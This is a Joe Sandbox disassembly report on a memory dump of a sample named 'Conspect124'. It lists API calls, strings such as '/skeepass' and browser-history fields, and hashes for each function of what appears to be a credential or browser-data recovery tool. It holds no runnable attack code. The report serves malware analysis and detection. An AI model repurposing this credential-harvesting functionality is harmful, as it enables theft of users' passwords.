                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                      APIs
                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                      • free.MSVCRT ref: 0040E49A
                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                      • memset.MSVCRT ref: 0040E380
                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                      • wcschr.MSVCRT ref: 0040E3B8
                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                      • API String ID: 3849927982-2252543386
                                      • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                      • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                      APIs
                                      • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                      • _snwprintf.MSVCRT ref: 0044488A
                                      • wcscpy.MSVCRT ref: 004448B4
                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@??3@_snwprintfwcscpy
                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                      • API String ID: 2899246560-1542517562
                                      • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                      • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                      APIs
                                      • memset.MSVCRT ref: 0040DBCD
                                      • memset.MSVCRT ref: 0040DBE9
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                      • wcscpy.MSVCRT ref: 0040DC2D
                                      • wcscpy.MSVCRT ref: 0040DC3C
                                      • wcscpy.MSVCRT ref: 0040DC4C
                                      • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                      • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                      • wcscpy.MSVCRT ref: 0040DCC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                      • API String ID: 3330709923-517860148
                                      • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                      • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                      APIs
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                      • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      • memset.MSVCRT ref: 004085CF
                                      • memset.MSVCRT ref: 004085F1
                                      • memset.MSVCRT ref: 00408606
                                      • strcmp.MSVCRT ref: 00408645
                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                      • memset.MSVCRT ref: 0040870E
                                      • strcmp.MSVCRT ref: 0040876B
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                      • String ID: ---
                                      • API String ID: 3437578500-2854292027
                                      • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                      • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                      APIs
                                      • memset.MSVCRT ref: 0041087D
                                      • memset.MSVCRT ref: 00410892
                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                      • DeleteObject.GDI32(?), ref: 004109D0
                                      • DeleteObject.GDI32(?), ref: 004109D6
                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                      • String ID:
                                      • API String ID: 1010922700-0
                                      • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                      • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                      APIs
                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                      • malloc.MSVCRT ref: 004186B7
                                      • free.MSVCRT ref: 004186C7
                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                      • free.MSVCRT ref: 004186E0
                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                      • malloc.MSVCRT ref: 004186FE
                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                      • free.MSVCRT ref: 00418716
                                      • free.MSVCRT ref: 0041872A
                                      • free.MSVCRT ref: 00418749
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free$FullNamePath$malloc$Version
                                      • String ID: |A
                                      • API String ID: 3356672799-1717621600
                                      • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                      • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                      • API String ID: 2081463915-1959339147
                                      • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                      • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                      • API String ID: 2012295524-70141382
                                      • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                      • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                      • API String ID: 667068680-3953557276
                                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                      APIs
                                      • GetDC.USER32(00000000), ref: 004121FF
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                      • SelectObject.GDI32(?,?), ref: 00412251
                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                      • SetCursor.USER32(00000000), ref: 004122BC
                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                      • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                      • String ID:
                                      • API String ID: 1700100422-0
                                      • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                      • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                      • String ID:
                                      • API String ID: 552707033-0
                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                      • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                      • strchr.MSVCRT ref: 0040C140
                                      • strchr.MSVCRT ref: 0040C151
                                      • _strlwr.MSVCRT ref: 0040C15F
                                      • memset.MSVCRT ref: 0040C17A
                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                      • String ID: 4$h
                                      • API String ID: 4066021378-1856150674
                                      • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                      • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf
                                      • String ID: %%0.%df
                                      • API String ID: 3473751417-763548558
                                      • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                      • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                      APIs
                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                      • GetTickCount.KERNEL32 ref: 0040610B
                                      • GetParent.USER32(?), ref: 00406136
                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                      • String ID: A
                                      • API String ID: 2892645895-3554254475
                                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                      APIs
                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                      • memset.MSVCRT ref: 0040DA23
                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
